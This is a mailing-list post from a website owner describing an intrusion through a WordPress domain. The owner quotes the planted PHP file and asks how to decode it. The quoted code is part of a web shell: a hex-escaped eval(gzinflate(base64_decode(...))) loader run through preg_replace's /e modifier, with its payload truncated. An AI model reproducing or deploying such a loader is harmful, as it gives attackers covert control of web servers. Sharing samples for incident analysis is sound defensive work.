We have hackers on our web server getting in thru one Domain... I think
there is a whole in WordPress.
Long story... a nuisance, But they are able to write files to locations
out outside the blog directory, insert strings into the first line on
.html files and are cloning our pages and storing them in obscure places
like /var/lib/dovecot/control/theHackedDomain (this directory is deep in
the system but writeable by the user for this domain)
We don't see how they are getting in. They are not able to touch
anything else on the box..
anyway... is there a live code function that can decrypt the string at
the and of this file?
--?php
$auth_pass = "347455f3975a7c84651eb69f10198b09";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b1pdxrHEjD82fec+x9aE24GYoQA2bkOEli2LNlybMnR4lV+yAADTDQwZGYQkh3996eqepnuWRCyk/uc97xyIkF3dXX1Xl1dizcsr7mTWXxdLnVP9o7f7h1/sl+cnr7pnsG37pPne4en9u[snip]
dLFUEiippqKn6fwE='\x29\x29\x29\x3B",".");?--
I can't wait until move our site over to RevIgniter; I think it will be
much more secure!
Sivakatirswami
www.himlayanacademy.com
_______________________________________________
use-livecode mailing list
use-livecode@lists.runrev.com
Please visit this url to subscribe, unsubscribe and manage your subscription
preferences:
http://lists.runrev.com/mailman/listinfo/use-livecode
